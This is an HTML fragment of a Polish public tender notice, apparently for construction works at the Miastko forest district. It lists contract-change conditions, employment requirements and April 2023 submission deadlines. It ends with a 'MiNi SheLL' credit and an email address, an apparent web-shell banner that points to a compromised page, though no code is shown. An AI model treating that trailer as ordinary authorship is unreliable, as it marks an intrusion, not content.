class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 pkt 1 PZP, Zam. przewiduje możliwość dokon. zmian Umowy:1)Przedm. Umowy poprzez zmianę zakresu robót bud. przewidz. do wyk. w ramach niniejszej Umowy w przypadku:a) konieczności wyk. robót zamienn.lub<br/>dodatk., których wyk. ma na celu prawidłowe zrealiz. Przedm. Umowy, a konieczność ich wykonania wynika z wad opisu<br/>tech.,b)konieczności wyk.robót zamienn. lub dodatk. niezb. do prawidłowego wyk. Przedm. Umowy, które nie zostały<br/>przewidziane w op.tech. przekazanej przez Zam.,c) zmiany op.tech.wykonan z inicjatywy Zam. ze względu na stwierdzone<br/>wady, co spowoduje konieczność wyk. robót zamienn. lub dodatk.;d) zmiany decyzji admin., na podstawie których<br/>prowadzone są roboty bud. objęte Umową, powodujące zmianę dotychczasowego zakresu robót przewidzianego w<br/>op.tech., 2) Przedm. Umowy, w szczególności zmiana sposobu wyk. Przedm. Umowy, zakresu robót, lokalizacji robót<br/>wsytuacji: a) wystąpienia innych war. geologicznych,geotechn., hydrolog. niż te wskazane przez Zam. w<br/>op.tech.,powodujących konieczność zmiany sposobu wykonania Przedm. Umowy;b) wystąpienia na terenie<br/>bud.niewybuchów,niewypałów, znalezisk archeolog. lub innych niezinwentaryz. obiek., które uniemożliwiają lub utrudniają<br/>wyk. robót 3)technologii wyk. robót lub mater. przewidzianych w op.tech. w przypadku niedostępności odpow. surowców lub<br/>mater. na rynku bud. albo zaniechania produkcji mater. przewidzianych w op.tech., co utrudnia możliwość wykonania<br/>Przedmiotu Umowy.4) terminu wyk. Umowy w przypadku:a) wystąpienia niemożliwych do przewidzenia niekorzys. war.<br/>atmosf.uniemożl. prowadzenie prac, w których niemożliwe jest prowadz. robót bezpiecznie pod względem BHP, w sposób<br/>prawidłowy, zgodny z umówioną technologią lub zasadami sztuki bud. b) opóźnienia innych inwestycji lub robót<br/>bud.prowadzonych przez Zam.lub innych zamawiających, które to inwestycje lub roboty kolidują z wyk. robót objętych<br/>Umową,c) opóźnienia Zam. w wyk. jego zobowiązań wynikających z Umowy lub przepisów powsz.obowiązującego prawa,co<br/>uniemożliwia terminowe wyk. Umowy przez Wyk, d)opóźnienia organów admin. publ.w wydaniu decyzji admin.,uzgodnień<br/>lub innych aktów admin.e) opóźnienia w uzyskaniu wymaganych uzgodnień, opinii, aprobat od podmiotów trzecich,<br/>f)wstrzymania wyk.Umowy przez Zam. z przyczyn nieleżących po stronie Wyk., o ile takie działanie powoduje, że nie jest<br/>możliwe wyk. Umowy w dotychczas ustalonym terminie, g)wystąpienia na terenie budowy niewybuchów, niewypałów lub<br/>znalezisk archeologicznych, które wymagały wstrzymania wykonania robót budowlanych przez Wykonawcę; h)wystąpienia<br/>awarii na terenie budowy, za którą odpowiedzialności nie ponosi Wykonawca, skutkującej koniecznością wstrzymania<br/>wykonania robót budowlanych przez Wykonawcę, i)wystąpienia niezinwentaryzowanych lub błędnie zinwentaryzowanych<br/>sieci, instalacji lub innych obiekt. w stosunku do danych wynikających z op.tech.przekazanej przez Zam., co<br/>spowodowałowstrzymanie wyk. robót bud., zmianę op.tech. lub wyk. robót dodatk. lub zamiennych, j)wystąpienia<br/>okoliczności uprawniających do zmiany Przedm.Umowy, o których mowa powyżej,jeżeli okoliczności te mają wpływ na<br/>termin wyk. Umowy, k) wystąp. war. siły wyż., które uniemożl. wyk. Umowy w dotychczas ustalonym terminie.W<br/>szczególności pożaru, zalania,wojny, zamieszek, epidemii,pandemii i innych klęsk żywiołowych, l) terminu realizacji<br/>Przedm.Umowy w przypadku przedłużającej się procedury udzielenia zamówienia publicznego o czas niezbędny do<br/>wyk.robót stanowiących przedm. Umowy, przy czym każda zmiana terminu wykonania Przedm. Umowy może nastąpić tylko<br/>o czas niezbędny do wyk. robót stanowiących przedm.Umowy, nie dłużej jednak niż o okres trwania okoliczności będących<br/>podstawą zmianyoraz ich następstw. 5) zmiana wys. wynagrodz.Wyk.y w przypadku a)konieczności<br/>wyk.robótdodatk.,zamienn. lub innychb)zmiany techn. lub mater. c)spełnienia się innychokolicz.uprawniających do zmiany<br/>Umowy.Pełen i szczegółowy opis w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy (SmartPZP), https://portal.smartpzp.pl/nadlesnictwo.miastko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-21 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełen i szczegółowy opis warunków zamówienia dostępny jest na stronie https://portal.smartpzp.pl/nadlesnictwo.miastko

Creat By MiNi SheLL
Email: jattceo@gmail.com